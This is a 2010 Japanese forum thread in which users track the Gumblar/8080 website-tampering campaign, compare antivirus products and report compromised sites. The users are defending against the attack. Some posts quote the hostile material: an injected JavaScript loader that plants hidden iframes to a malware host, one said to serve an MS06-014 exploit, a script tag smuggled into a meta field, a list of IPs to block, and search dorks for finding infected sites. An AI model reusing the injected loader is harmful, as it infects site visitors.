74 :名無しさん@お腹いっぱい。:2010/03/13(土) 00:17:02
全然やらかした事のない
セキュリティソフトなんか
無いんじゃないの?

75 :名無しさん@お腹いっぱい。:2010/03/13(土) 01:20:46
これどうやって自分が感染してるか確かめるんだよ?
分からなきゃ何度クリーンインストールしても一緒じゃねえか

76 :名無しさん@お腹いっぱい。:2010/03/13(土) 01:50:36
いつもと違うプロセスがたちあがってりゃわかるだろ
そんなんで逆切れしてっからダメなんだ

77 :名無しさん@お腹いっぱい。:2010/03/13(土) 06:08:56
>>65-68
は?

78 :名無しさん@お腹いっぱい。:2010/03/13(土) 11:22:50
反論は文章で

79 :名無しさん@お腹いっぱい。:2010/03/13(土) 12:01:20
なんかもう騒ぐ人も下火になったなあ

80 :名無しさん@お腹いっぱい。:2010/03/13(土) 13:23:17
騒いでも再改ざん繰り返す業者が多いからじゃない?
しかも、対応しにくいように徐々にウィルス進化中

81 :名無しさん@お腹いっぱい。:2010/03/13(土) 13:45:21
.htaccess改ざんに移行して見つけにくくなったのもあるんじゃない?

82 :名無しさん@お腹いっぱい。:2010/03/13(土) 13:54:12
Evolution and threat of botnetでググれば学術記事が大量に見つかるけど
大学の研究ネタにもなってるとは知らなかったな

83 :名無しさん@お腹いっぱい。:2010/03/13(土) 14:23:09
>>81
アンチウイルスソフトでも未対応のやつ多そう

84 :名無しさん@お腹いっぱい。:2010/03/13(土) 14:26:35
なんにしろ対策してれば引っかからないし
ほんとの0dayなんかほとんどない
情弱以外関係ない

85 :名無しさん@お腹いっぱい。:2010/03/13(土) 14:51:31
         ,,-―--、
        |:::::::::::::;;;ノ  / ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄ ̄
        |::::::::::( 」 < なんにしろ対策してれば引っかからないし
        ノノノ ヽ_l   | ほんとの0dayなんかほとんどない
       ,,-┴―┴- 、|  ∩_  情弱以外関係ない
     /,|┌-[]─┐| \  (  ノ______________
      / ヽ| |  情  | '、/\ / /
     / `./| |  弱 .|  |\   /
     \ ヽ| lゝ    |  |  \__/
     \ |  ̄ ̄ ̄   |
      ⊂|______|
       |l_l i l_l |
       |   ┬    |

86 :名無しさん@お腹いっぱい。:2010/03/13(土) 14:55:15
癇に障ったか情弱

87 :名無しさん@お腹いっぱい。:2010/03/13(土) 14:58:56
情弱と言うか無知なだけ
0day攻撃がしばらく問題だったんだよ

88 :名無しさん@お腹いっぱい。:2010/03/13(土) 15:02:33
それに未修正の脆弱性もいろいろあるし
いつ攻撃されてもおかしくない

89 :名無しさん@お腹いっぱい。:2010/03/13(土) 15:03:09
0dayの定義分かってないのか情弱

90 :名無しさん@お腹いっぱい。:2010/03/13(土) 15:04:19
またいつ攻撃されてもおかしくないとか
現実的でないこといってびびってるのか
LANけーぶるひっこぬけ

91 :名無しさん@お腹いっぱい。:2010/03/13(土) 15:06:26
神戸市関連のHPがウイルス感染、改ざん被害
ttp://www.kobe-np.co.jp/news/jiken/0002779319.shtml

92 :名無しさん@お腹いっぱい。:2010/03/13(土) 15:07:41
糞狐はいつ攻撃されてもおかしくないな
ハイリスク報知だし

93 :名無しさん@お腹いっぱい。:2010/03/13(土) 15:21:06
>>91
自治体は、やる気無いからなぁ
ttp://news.biglobe.ne.jp/social/699/ym_100307_6999091466.html

94 :名無しさん@お腹いっぱい。:2010/03/13(土) 15:28:22
未だにIE6とか使ってるんだろうか

95 :名無しさん@お腹いっぱい。:2010/03/13(土) 15:31:14
自治体関連掘り出していけばザックザック出てきそうだな。
どうせwindowsのパッチも当ててないし

96 :名無しさん@お腹いっぱい。:2010/03/13(土) 16:44:23
自治体はその程度なのに国は今の知ったか大臣主導で情報を共有化する気だけどね。

97 :名無しさん@お腹いっぱい。:2010/03/13(土) 16:52:54
>>96
機密情報をShareで全力共有しそうだなw

98 :名無しさん@お腹いっぱい。:2010/03/13(土) 17:11:58
某ボランティア団体で活動してるが、団体所有のVistaはSP1のまんまだし
Adobe ReaderはVer.8のプレインストールのまま
Adobe Flash Player に関しては推して知るべし
つ〜かプリインストールのセキュリティソフト期限切れてるし...

99 :名無しさん@お腹いっぱい。:2010/03/13(土) 18:05:13
大規模な情報流出しないと改善されなさそうだね。

100 :名無しさん@お腹いっぱい。:2010/03/13(土) 18:25:00
>>98
Avastくらい入れてやれよ、ボランティアでw

101 :名無しさん@お腹いっぱい。:2010/03/13(土) 18:27:23
それがねダンナ、かてて加えて
某福祉事務所のXP、SP2のまんまだし
当然Adobe関連はプレインスコのままだし
それよりなによりファイアウォールもアンチウィルスすら入ってねーし
で、そのPC使って障がい者相手のインターネット入門講座やるんだと

102 :名無しさん@お腹いっぱい。:2010/03/13(土) 18:31:13
>>100
とりあえずMSE入れたら重くて使い物にならんしorz

103 :名無しさん@お腹いっぱい。:2010/03/13(土) 18:32:22
アップデートていう概念自体を持ち合わせてないだけ

104 :名無しさん@お腹いっぱい。:2010/03/13(土) 18:32:39
>>101
ubuntuにシ十

105 :名無しさん@お腹いっぱい。:2010/03/13(土) 18:44:35
>>101
金をもらうためにPC+回線いれたのに
それ以上に金かけたくないってことだろ
こんなのがNPO法人になって金稼ぎしてるんだよww

106 :名無しさん@お腹いっぱい。:2010/03/13(土) 18:53:09
新型来ないね

107 :名無しさん@お腹いっぱい。:2010/03/13(土) 19:44:27
役所なんかもっとひどくてupdateしたりすると勝手にそんなことスンナって怒られるレベル。

去年のネットでできる確定申告なんて、
新しいjava捨ててわざわざ古いバージョン入れないと動かなかった。
判明するのに子1時間悩まされた。

108 :名無しさん@お腹いっぱい。:2010/03/13(土) 20:12:09
そんなの役所にかぎらんだろ
勝手にされたら困る

109 :名無しさん@お腹いっぱい。:2010/03/13(土) 20:13:25
こともある

110 :名無しさん@お腹いっぱい。:2010/03/13(土) 20:30:06
まともに管理してるところなら多少遅くなってもUpdateする予定だから勝手にやると怒られる
管理してないところは金がかからなくて業務に支障がなければ「勝手にどうぞ」てな感じ
保守とセキュリティ対策は業務妨害とコストとしてしか見ないのが見識のない組織の現実

111 :名無しさん@お腹いっぱい。:2010/03/13(土) 20:31:37
>>108
言葉足らずだった。

中途で役所のSEで入った友達の話。
あまりにも古い形式使っててセキュリティ的にヤバイって言って
議題に上げても一蹴。

『後から入ってきたくせに勝手にそんなことマンドクサそうなこと言い出すな!』
ってニュアンスだったそうな。

112 :名無しさん@お腹いっぱい。:2010/03/13(土) 20:37:28
そうかそうか

113 :名無しさん@お腹いっぱい。:2010/03/13(土) 20:46:24
>>100
ボランティアの人、あの警告音に驚くだろうなぁ・・・

114 :名無しさん@お腹いっぱい。:2010/03/13(土) 20:47:40
avast5になって音変わったんじゃなかったっけ。

115 :名無しさん@お腹いっぱい。:2010/03/13(土) 20:51:37
改ざんされた偽セキュリティソフトのWebページを踏んだ様で、PCを立ち上げると
「WARNING! 40 infections found!!!'」の表示が出て他へ他へ進めません。
Internet ExplorerやOutlook Expressすら立ち上げることができず困っています。

PCはだいぶ前のNEC VR770Cという一体型で、今になって使用書を良く読むと
HDDに再セットアップ用データが入っていて再セットアップ用CD-ROMが作れた
様ですが、恥ずかしながらそれもしていません。

何とかこの哀れなPCを復活させる手はないでしょうか?
蛇足ながら、窓から投げ捨てるには高層マンションの25階で危険すぎるのです。

116 :名無しさん@お腹いっぱい。:2010/03/13(土) 20:55:17
OS買って来て入れなおせ

117 :名無しさん@お腹いっぱい。:2010/03/13(土) 21:01:26
力一杯床に叩き付けろ

118 :名無しさん@お腹いっぱい。:2010/03/13(土) 21:06:03

        / ̄ ̄\
      /       \      ____
      |::::::        |   /      \
     . |:::::::::::     |  /        \   
       |::::::::      |/ -━-  -━-   \ 
     .  |::::::::::::::    } |    (__人__)     | 
     .  ヽ::::::::::::::    } \   ` ⌒´     _/ 
        ヽ::::::::::  ノ   |           \
        /:::::::::::: く    | |         |  |
-―――――|:::::::::::::::: \-―┴┴―――――┴┴――
        / ̄ ̄\
      /       \      ____
      |::::::        |   /      \
     . |:::::::::::     |  /        \   
       |::::::::      |/  -━-  -━-  \ 
     .  |::::::::::::::    } |     (__人__)    | 
     .  ヽ::::::::::::::    } \    ` ⌒´    _/ 
        ヽ::::::::::  ノ   |           \
        /:::::::::::: く    | |         |  |
-―――――|:::::::::::::::: \-―┴┴―――――┴┴――
        / ̄ ̄\
      /       \      ____
      |        |   /      \
     . | -━- -━-|  /        \   
       |::::: (__人__) |/  -━-  -━-  \ 
     .  |::::::::` ⌒´   } |     (__人__)    | 
     .  ヽ::::::::::::     } \    ` ⌒´    _/ 
        ヽ::::::::::  ノ   |           \
        /:::::::::::: く    | |         |  |
-―――――|:::::::::::::::: \-―┴┴―――――┴┴――

119 :名無しさん@お腹いっぱい。:2010/03/13(土) 21:45:38
起動時にF8とか連打して出るメニューにリカバリーとかなかったっけバリュースター

120 :名無しさん@お腹いっぱい。:2010/03/13(土) 21:50:36
>>115
NECに電話して型番とシリアルナンバー伝えて有料リカバリディスク買えばいいんじゃ

121 :名無しさん@お腹いっぱい。:2010/03/13(土) 21:59:18
>>115
お気に入りの型番なんだ
へぇ〜この板のアンチとおんなじジャン〜

122 :名無しさん@お腹いっぱい。:2010/03/13(土) 22:01:21
ソフト入手しようと思ったらavast!が怒ったんだけど感染してる?

Hardwaremania BlackBox
://blackbox●hardwaremania●com/en/home

123 :名無しさん@お腹いっぱい。:2010/03/13(土) 22:26:19
>>122
/js/app.js

124 :名無しさん@お腹いっぱい。:2010/03/13(土) 22:33:16
>>122
Webシールドが遮ったなら大丈夫

125 :名無しさん@お腹いっぱい。:2010/03/13(土) 22:56:23
>>113
ドラクエノレベルアップの音
にでも変えとけw

126 :名無しさん@お腹いっぱい。:2010/03/14(日) 10:07:04
そういえば、一時期出てた不審なIPアドレスどうこうとかはまだあるの?

今、自分が遮断設定にしてるのは
67.212.81.67
67.215.237.98
67.215.238.194
67.215.246.34
91.215.156.74
91.215.156.75
91.215.156.76
94.76.250.73
94.229.65.174
193.104.12.20
195.24.76.250
210.51.166.228
216.45.48.66

127 :名無しさん@お腹いっぱい。:2010/03/14(日) 10:23:18
ああほんと(苦笑)

128 :名無しさん@お腹いっぱい。:2010/03/14(日) 10:27:04
感染してから小手先で情報送信防げるとかしてもね


129 :名無しさん@お腹いっぱい。:2010/03/14(日) 10:43:34
>>126
0:基本的な対策(アップデート等)を行っておく ←必須

1:JAVAScriptをOFFしておく ←推奨
2:「:8080/」を含むURLを全て蹴る ←可能なら

130 :名無しさん@お腹いっぱい。:2010/03/14(日) 10:48:02
お前ら8080って何て呼んでる?
・ハチゼロハチゼロ?
・ハチマルハチマル?
・ハッセンハチジュウ?

131 :名無しさん@お腹いっぱい。:2010/03/14(日) 10:49:49
>>129

1と2は不要

132 :名無しさん@お腹いっぱい。:2010/03/14(日) 10:52:34
そこまでするなら
flashとpdfリーダーアンインストールしろってこった

133 :名無しさん@お腹いっぱい。:2010/03/14(日) 11:03:22
1はpdfビューアのJavaScriptをオフ、ならありじゃね?

134 :名無しさん@お腹いっぱい。:2010/03/14(日) 12:28:35
ガンブラー:神戸市のサイトに感染。被害拡大中
http://tsushima.2ch.net/test/read.cgi/news/1268536865/

135 :名無しさん@お腹いっぱい。:2010/03/14(日) 12:44:29
>>134
>>91

136 :名無しさん@お腹いっぱい。:2010/03/14(日) 12:45:59

   このサイトは改竄されてるわ

         _,,.. -─-- 、,
     ,.::'´:::::::::::::::::::::::::::`::..、___   |  _/
    /::::::::/:::;:::::::i:::::::::;::::::::::::::く  〈7´   ピキーン
    ,'::::::::;'::::/:::/;ハ::::::;ハ:::::i:::::::ハ   /
    |::::::::|:::::|::/メ、|__/ |_ィ!、::::!::!    ∧
‐ ─.|::::::::|:::::|7´ ∩    ∩Y|::|::| ─ヘ/  ':, /`ーw─'^ー ─ -
    |::::::::|::::八. り   . り 〈::」:」       ∨
    |::::::::|:::::|""    _  ",ハ|
    !::::::::|:::::|>,、   __,.. イ:::::|
   ,':::::::::|:::::|´ \_「`\:::|::::::|     _________
  ./:::::::::::;\ト、   }_X_{ .〉、:::::|    //           /
  /:::::::::::/  、|\/ム`ァl/ \!   //  Tewinabook.  /
/:::::::::::;'  ´ ̄/>‐-、 ./    >‐//            /
:::::::::::::/|.    | |  、ン^'く::\   //            /
──‐‐!、__|.」-‐'ーヘ‐'─'` ー//________/───
             /l二二]O)_l王l_l三l__oOン
             ヽ、_____ノ

137 :名無しさん@お腹いっぱい。:2010/03/14(日) 13:24:25
キモイもん貼るなよ

138 :名無しさん@お腹いっぱい。:2010/03/14(日) 13:29:46
キモイ顔の奴はレスするなよ

139 :名無しさん@お腹いっぱい。:2010/03/14(日) 15:53:53
じゃあ2ch動かなくなるじゃん

140 :コテハン:2010/03/14(日) 17:54:42
.substr連発型
//www●w-com●jp/

チェッカー3は未対応だが・・・作者殿はどこ?

141 :コテハン:2010/03/14(日) 18:01:56
www●w-com●jp

/1home/?S=D
/2company/?S=D
/2company/?D=A
/3business/?N=A
/5reference/?N=D
/5reference/?M=D
/5reference/?N=A
/5reference/?S=D


142 :名無しさん@お腹いっぱい。:2010/03/14(日) 18:26:05
飽きたので開発終了です

143 :名無しさん@お腹いっぱい。:2010/03/14(日) 18:30:07
スレチで申し訳ないんだけど、今使ってるフリーのアンチウィルスってガンブラーとか8080には弱いみたいだから、これを期に有償ソフトに変えようかと思ってるんだけどそれにするか悩む
AV-TEST.orgでいつも優秀で、ヒューリスティックも高性能なG Data、
AV-TESTでは二番目ながらかなり高性能なマカフィー、
AV-T(ryでは上位3位には入らないけど、ttp://honeywhales.com/では圧倒的に高性能なノートン

まぁぶっちゃけ新種の対応には厳しいからどれでもダメなんだろうけどw

一般的にはG Dataを選ぶんだろうけど、gredAVアクセラレータとは共存できないみたいだし、無難にマカフィーでも良いけど除外設定できないし、何よりhoneywhalesの結果が引っかかる
確かにhoneywhalesの地図にあるVirusTotalの結果を見るとマカフィーやG Dataでは検出できなくてノートンでは検出できるってものが多いんだよね
それに、AV-TEST.orgとか、AV Comparativesのレポートは裏でお金の取引をして順位を上げてるなんて噂もあるし(嘘だと思うけど


どっちを信用すれば良いのかな?
ここのスレには毎度お世話になってるから、今回も書き込んでみました。宜しければご回答お願いします

144 :名無しさん@お腹いっぱい。:2010/03/14(日) 18:31:01
>>143
そんなもんに神経使う前に日頃からの対策に神経を使ってください

145 :143:2010/03/14(日) 18:38:00
>>144
大丈夫既に各ソフトウェアのアップデートもしてるし、Firefox+Noscript+RequestPolicyでリダイレクトを防止して、AdblockPlusで8080ドメインをブロックしてる

146 :名無しさん@お腹いっぱい。:2010/03/14(日) 18:39:04
>>143
サイト改竄に対してセキュリティソフト依存は危険。

極端な話、穴をしっかり塞いでおけばノーガードでも感染しない。

147 :143:2010/03/14(日) 18:46:21
>>146
あーそういえば穴を塞いでおけば大丈夫だったね。基本を忘れてた
セキュリティソフト依存が危険な事はわかってる。
だけど、ゼロデイ状態とかになったときの為とか、ガンブラー以外のウィルスに対しても広く対応させる為とかで、補助的な意味でウィルス対策ソフトの乗り換えを考えてる

148 :名無しさん@お腹いっぱい。:2010/03/14(日) 18:52:05
3行目なら完全にスレチ

149 :名無しさん@お腹いっぱい。:2010/03/14(日) 18:52:10
ソースの最後の方に function〜ゴチャゴチャ書いてたら
すべてアウトでいいの?
.>>5 で 反応しないんだけど


150 :名無しさん@お腹いっぱい。:2010/03/14(日) 18:53:18
どうやったらそんな発想ができるんだろう……

151 :名無しさん@お腹いっぱい。:2010/03/14(日) 19:08:06
> 反応しないんだけど
無害だろw

152 :名無しさん@お腹いっぱい。:2010/03/14(日) 19:11:12
トレンドマイクロだと
Possible_Gumb-3 と 反応したから
確かめてみたかった



153 :名無しさん@お腹いっぱい。:2010/03/14(日) 19:25:41
>>147
ゼロデイならほとんどの場合セキュソフトのヒューリスティックに引っかかるかどうかだから
下手すると乗り換え前のソフトだと検出したが乗り換え後のソフトだとスルーと言うこともありえるぞ

154 :名無しさん@お腹いっぱい。:2010/03/14(日) 19:36:25
>>147
ある程度わかってる人なら乗り換えても問題はないと思うけど
そうじゃない人には慣れてるの使っとけといってる
実際そこまで大差ないし

今変えたとして直後にそれが調子悪くなったらまた変えるの?
毎回なんかあるごとに乗り換えてたらキリがなくね?

155 :名無しさん@お腹いっぱい。:2010/03/14(日) 19:42:57
115です。2ちゃんネラーって、ガヤガヤとうるさいだけで全く当てになりませんね。

ろくなレスが付かないので同じ質問をOKEaveに書き込んだら、たちどころに適切な
役立つ投稿が何通もはいりました。

156 :名無しさん@お腹いっぱい。:2010/03/14(日) 19:46:11
OKWaveなら知ってるお^^

157 :名無しさん@お腹いっぱい。:2010/03/14(日) 19:50:01
>>155
>>115はスレチ。
だから誰もマトモに答えなかった。以上。

158 :名無しさん@お腹いっぱい。:2010/03/14(日) 19:54:53
どう見てもなりすましなのにいちいち釣られるなよ・・・

159 :名無しさん@お腹いっぱい。:2010/03/14(日) 21:36:05
>>153
あーそっかwヒューリスティックになるんだよなw
確かノートンとマカフィーは・・・微妙だったような
前入れてたのはAntiVirとMSEだったからなかなかの性能だったよなー

親がノートン使ってて、3台までインストール可能ってなってたからさっき入れてみたけど、調べてみたらオンデマンドもヒューリスティックもAntiVirよりも下だったな@AVComparatives

>>154
大差ないのか・・・orz
確かにキリないなぁ。どうしよう
使い慣れてるのかー。だったらフリーのになるのかなぁ
確かに、ずべてのウィルスを検出できる製品なんてないし、ウィルスも日々大量生産されてるわけだし、AV-TESTとかはあくまで一例であって、実際はそんなに大差ないのかもしれないな

とりあえずテスト機関のレポートにあまりとらわれず、よく考えてみる事にする。答えてくれた人、ありがとうございます。

160 :143:2010/03/14(日) 21:37:21
連レススマソ。↑は143です

161 :名無しさん@お腹いっぱい。:2010/03/14(日) 22:00:02
もうええっちゅーねん
どんだけ語るんだよ

162 :名無しさん@お腹いっぱい。:2010/03/14(日) 22:34:26
>>149
埋め込みに失敗(?)とかコメントアウトされてるとかで
実際には機能してないのもある

163 :名無しさん@お腹いっぱい。:2010/03/15(月) 07:56:39
NoScript使えよ

164 :名無しさん@お腹いっぱい。:2010/03/15(月) 08:06:12
おことわりします

165 :名無しさん@お腹いっぱい。:2010/03/15(月) 15:54:12
下火になってきたみたいだな

166 :コテハン:2010/03/15(月) 16:19:38
>>142 orz

ic-isweb●hp●infoseek●co●jp/
isay●livedoor●biz/ ←!

<!--トロイを絶賛配布中!(無料)-->
www●plci●net/egf/
<!--更新履歴(不要の場合はここから削除)-->
<div class="module-archives module">
<div class="module-header"
<script>var (以下略

・・・コードは必要なんでしょうカネ?

167 :名無しさん@お腹いっぱい。:2010/03/15(月) 16:24:44
嫌な無料配布だな

168 :八頭 ◆YAGApwSaEw :2010/03/16(火) 00:33:10
ヒマそうな冗談者は
腕試しにフランスドメイン(fr)洗ってみてくれ

169 :コテハン:2010/03/16(火) 01:21:04
>>168
なして?

170 :八頭 ◆YAGApwSaEw :2010/03/16(火) 01:51:56
ttp://i40.tinypic.com/20a6z4w.jpg
ここんとこずっと仏が被害で突出しているみたい

171 :八頭 ◆YAGApwSaEw :2010/03/16(火) 01:57:07
オマケ

国名略号 and 国名ドメイン早見表
ttp://www1.coralnet.or.jp/kusuto/Data-Room/country-codes.html
EU諸国 マップ
ttp://www.d.umn.edu/cla/faculty/troufs/anth1095/images/map_eu_countries_europe.jpg

172 :名無しさん@お腹いっぱい。:2010/03/16(火) 02:26:08
genom氏のサイトには特定の個人や団体の情報なんて書かれてないだろ。
何でわざわざモザイクなんてかけるんだ?

173 :名無しさん@お腹いっぱい。:2010/03/16(火) 03:01:09
その読み間違いは初めて見た

174 :名無しさん@お腹いっぱい。:2010/03/16(火) 03:25:14
avast!スレより
www●ebookjapan●jp/ebj/title/10429.html

175 :コテハン:2010/03/16(火) 03:35:38
>>168
けんさくわーど
"new String();" "new Date();" "new Array();" -JAVA -JAVAScript site:.fr

ぐーぐる先生
ttp://www.google.co.jp/search?q=%22new+String%28%22+%22new+Date%28%22
+%22new+Array%28%22+-JAVA+-JAVAScript+site%3A.fr&btnG=%E6%A4%9C%E7%B4
%A2&hl=ja&lr=&sa=2

びんぐ
ttp://www.bing.com/search?q=%22new+String%28%29%3B%22+%22new+Date%28%
29%3B%22+%22new+Array%28%29%3B%22+-JAVA+-JAVAScript+site%3A.fr&go=&fo
rm=QBLH&filt=all

禿(やふー)
ttp://search.yahoo.co.jp/search?p=%22new+String%28%29%3B%22+%22new+Da
te%28%29%3B%22+%22new+Array%28%29%3B%22+-JAVA+-JAVAScript+site%3A.fr&
ei=UTF-8&fr=top_ga1_sa&x=wrt



176 :名無しさん@お腹いっぱい。:2010/03/16(火) 03:43:34
>>170
それ、スクリプトが埋まってるって意味で言ってる?

177 :コテハン:2010/03/16(火) 03:44:30
>>174
ずいぶんアレな仕込み方だが・・・
//w●robints●us/us●js

//w●robints●us/cnzz●html
//w●robints●us/614●html
//w●robints●us/jf●html
//w●robints●us/jg●html
この先はシラネ

178 :名無しさん@お腹いっぱい。:2010/03/16(火) 07:11:05
※4発装填中
http://w●robints.us/us.js

4発の内訳

try{__m}catch(e){__m=1;document.title=document.title.replace(/\<(\w|\W)*\>/,"");
if (document.cookie!='__m'){
document.cookie='__m;expires='+(new Date(((new Date()).getTime()+600000)).toGMTString())+';';
document.write("<iframe src=http://w●robints.us/cnzz.html width=0 height=0></iframe>");
document.write("<iframe src=http://w●robints.us/614.html width=0 height=0></iframe>");
document.write("<iframe src=http://w●robints.us/jf.html width=0 height=0></iframe>");
document.write("<iframe src=http://w●robints.us/jg.html width=0 height=0></iframe>");
}}

飛ばされる先は
<iframe src=hXXp://w●robints●us/cnzz●html width=0 height=0>
</iframe>

<div style=display:none>
<script src="hXXp://s10●cnzz●com/stat●php?id=1990191&web_id=1990191" language="JavaScript">
</script>
</div>

マイクロソフトのデータから総計としては少ないがこの御時世に未だMS06-014エクスプロイト。614.html
ttp://img.microsoft.com/japan/security/images/contents/SirV7MalType.png

自国で撒くと足がつきやすいから他国に撒く
どうせ撒くなら足がつきにくい国はどこか?
答え.ウイルス黒人街中国ロシア

でもどうして未だにMS06-014なのか?614.html

179 :名無しさん@お腹いっぱい。:2010/03/16(火) 08:02:41
Malwarebytes' Anti-Malware 公式サイト
http://www.malwarebytes.org/mbam.php

180 :名無しさん@お腹いっぱい。:2010/03/16(火) 10:28:14
e-bookjapan、凸ってみた。
ツイッターのアカウントあるけど、こっちも凸ってみる?

181 :名無しさん@お腹いっぱい。:2010/03/16(火) 10:28:47
もう埋め込みの方は更新しないのかな。
毎週更新されて楽しかったのに。

182 :名無しさん@お腹いっぱい。:2010/03/16(火) 12:21:30
>>181
戦略的撤退(休眠)のような気がする

183 :名無しさん@お腹いっぱい。:2010/03/16(火) 14:54:43
e-bookjapan対応速かった。
マトモなとこだとホッとするな。

184 :名無しさん@お腹いっぱい。:2010/03/16(火) 15:20:57
凸乙
メンテになってるな

185 :名無しさん@お腹いっぱい。:2010/03/16(火) 19:44:58
「おいくつですか?」
「キャー痴漢!」
なんてリスク背負いたくないしな

186 :名無しさん@お腹いっぱい。:2010/03/16(火) 19:58:40
いつの間にかflashplayerが手動DL出来なくなっているんだが
最新版を直DLできるURLとかないですかね?(以前は、ここをクリックで手動DL可能だった)

187 :名無しさん@お腹いっぱい。:2010/03/16(火) 20:23:15
>>186
最新版ならいつもこのアドレス
ttp://fpdownload.adobe.com/get/flashplayer/current/install_flash_player_ax.exe
ttp://fpdownload.adobe.com/get/flashplayer/current/install_flash_player.exe


188 :名無しさん@お腹いっぱい。:2010/03/16(火) 20:30:15
>>187
ありがとう
しかし・・少し前までは通常ページからダウンロードを選択→ブラウザのブロック機能で
インストーラの発動を止める→ここをクリックで手動DLが可能だったのに何というせこさ・・

189 :名無しさん@お腹いっぱい。:2010/03/16(火) 22:09:19
OperaやChromeならオフラインインストーラが落ちてきたはず…

190 :名無しさん@お腹いっぱい。:2010/03/16(火) 23:03:42
ebookjapan復帰した。
「ウイルス感染確認のお願い」のページで、なぜアバスト!を勧めてるのかは不明だけど。

>>184
トップページではちゃんと「ウイルス感染の連絡があった」と記述されてた。
サブページはメンテって記述。
マトモな対応だ。これが普通だよな。

191 :名無しさん@お腹いっぱい。:2010/03/16(火) 23:07:18
なんかこのスレで初めてマトモな対応をしたサイトを見た気がする

アバスト!は無料だし今回genoウィルスにまじめに取り組んでる少ないウィルス対策ソフトだからじゃないかなと推測

192 :名無しさん@お腹いっぱい。:2010/03/16(火) 23:08:16
あ、そうそう、忘れてた。

puremis●net/
mrtb●puremis●net/
jmt●puremis●net/

随分ほったらかしにしてるみたい。

193 :名無しさん@お腹いっぱい。:2010/03/17(水) 00:22:16
>>192
無害だからね

194 :名無しさん@お腹いっぱい。:2010/03/17(水) 01:22:17
>>192
おちゅ。
エックスサーバーにつーほーしますた。

>>193


195 :名無しさん@お腹いっぱい。:2010/03/17(水) 04:14:40
ebookjapan陥落時のキャッシュを拾ってみた

■アクセス注意!
ttp://74.125.153.132/search?q=cache:MVuDVrdidDQJ:www.ebookjapan.jp/ebj/tag_genre.asp

<meta name="Keywords" content="〜〜中略〜〜
,貸本マンガ<Script src=hXXp://w●robints●us/us●js></Script>" />

変な所に仕込んであるしw

196 :名無しさん@お腹いっぱい。:2010/03/17(水) 04:30:43
アクセス注意って言うぐらいなら.を●に変えろよ
それともアレかあえてひっかける釣りか?

197 :名無しさん@お腹いっぱい。:2010/03/17(水) 07:27:58
芸能人ブログID・パス流出、ホリプロ元社員逮捕
http://www.yomiuri.co.jp/national/news/20100317-OYT1T00021.htm

 インターネット広告会社「サイバーエージェント」(東京都渋谷区)が運営するブログサイト「アメーバブログ(アメブロ)」を
利用していた芸能人のIDとパスワードがネット上に流出した事件で、警視庁が、大手芸能事務所「ホリプロ」(目黒区)
元契約社員岡田邦彦容疑者(30)を不正アクセス禁止法違反の疑いで逮捕していたことがわかった。

 逮捕は3月13日。

 捜査関係者によると、岡田容疑者は今年1月1日未明、タレントの藤本美貴さんのブログに、藤本さんのIDとパスワードを
使って不正に侵入し、芸能人445人分のIDとパスワードなどが記載された個人情報リストを張り付けた疑い。その結果、
リストは藤本さんのブログを閲覧した人がクリックすると、ダウンロードできるようになっていた。

 このリストはサイバー社の内部文書。同社社員が日頃から仕事上の付き合いのあった岡田容疑者に誤ってメールしたのが原因だった。
アメブロは日記形式のホームページ。サイバー社によると、事件後、リストの芸能人らのパスワードは変更されており、流出による被害は確認されていない。

(2010年3月17日03時03分 読売新聞)

198 :名無しさん@お腹いっぱい。:2010/03/17(水) 08:52:54
>>197
ホリプロの元社員も悪いけどメールで送ったサイバーの社員も罰せられるべきだよな

199 :名無しさん@お腹いっぱい。:2010/03/17(水) 09:29:44
スレチ

200 :名無しさん@お腹いっぱい。:2010/03/17(水) 10:20:14
ID分かれば後は力押し
ゲイツは本当に便利なチートマシンを作ってくれたぜ

201 :名無しさん@お腹いっぱい。:2010/03/17(水) 10:25:01
>>197
パスワード送られてきたらログインしたくなっちゃうかもな
俺もミキティのパスが送られてきたらログインしちゃったかもしれん
でもリストをブログに貼り付けることはしないわな

202 :名無しさん@お腹いっぱい。 :2010/03/17(水) 11:12:49
あぁ、そのリスト、おれもブログみたらダウソされてきたので持ってるわ
すげーいい加減なexcel管理だなぁと思った
もっときれいに管理してやれよ
あと、芸能人なのに自分の誕生日パスワードにするのはやめろ
公開されてるのに無用心すぎるだろw


203 :名無しさん@お腹いっぱい。:2010/03/17(水) 11:34:32
顧客の個人情報を暗号化もせずにメールで送る非常識なクソ企業
日常的にずさんな管理しているんだろう。

204 :名無しさん@お腹いっぱい。:2010/03/17(水) 13:19:05
【フリー併用】avast!+MSE+gred AntiVirusのトリプルエンジン【最強仕様】

以下の順番にインストールする。

avast! Free Antivirus のダウンロード (日本語公式ページ)
http://www.avast.com/ja-jp/free-antivirus-download

ウイルス、スパイウェア、マルウェア対策 | Microsoft Security Essentials
http://www.microsoft.com/security_essentials/

gred Anti Virus アクセラレータ | ダウンロード
https://www.gred.jp/avx/download.html

(ちなみに併用使用でも問題はありません)

205 :名無しさん@お腹いっぱい。:2010/03/17(水) 13:26:56
釣りだろうけど
実験モルモットな組み合わせだなw

206 :名無しさん@お腹いっぱい。:2010/03/17(水) 13:35:10
avastとmseを併用する価値が見出せない
併用は監視の重複で権利の奪い合いになってスルーが起きやすくなるからかえって性能が落ちる
いろんなとこにコピペしまくってるとこ見ると被害者を増やしたいのかね

207 :名無しさん@お腹いっぱい。:2010/03/17(水) 13:37:13
>>204
avast!++gred AntiVirus
MSE+gred AntiVirus

こうだろ?

208 :名無しさん@お腹いっぱい。:2010/03/17(水) 14:10:55
Avira+avast!(4.8のwebシールドのみ)+comodo+SpyBot(免疫化のみ)
この組み合わせは良いぞ

209 :名無しさん@お腹いっぱい。:2010/03/17(水) 14:22:23
avast!+MSE(avastの検疫ファイルを除外指定)で無問題。

210 :名無しさん@お腹いっぱい。:2010/03/17(水) 14:36:16
トリプルエンジン(笑)

211 :名無しさん@お腹いっぱい。:2010/03/17(水) 15:45:55
>>2以上の対策は自己満足だから好きにすればいいけど、ウザいからいちいち宣伝しないでね。

212 :名無しさん@お腹いっぱい。:2010/03/17(水) 16:24:54
ちっ、うるせーな

213 :名無しさん@お腹いっぱい。:2010/03/17(水) 16:27:21
いやあ彼ももう忘れ去られた存在だねえ

214 :名無しさん@お腹いっぱい。:2010/03/17(水) 18:34:30
>>210
あ?ルナスケープなめてんのか?

215 :名無しさん@お腹いっぱい。:2010/03/17(水) 20:01:13
ルナスケープってなにそれ食えんの?

216 :名無しさん@お腹いっぱい。:2010/03/17(水) 21:10:29
Adobe Readerをアンインスコして、他社製のPDF読み込みソフトを導入するのはGumbler対策になる?ならない?

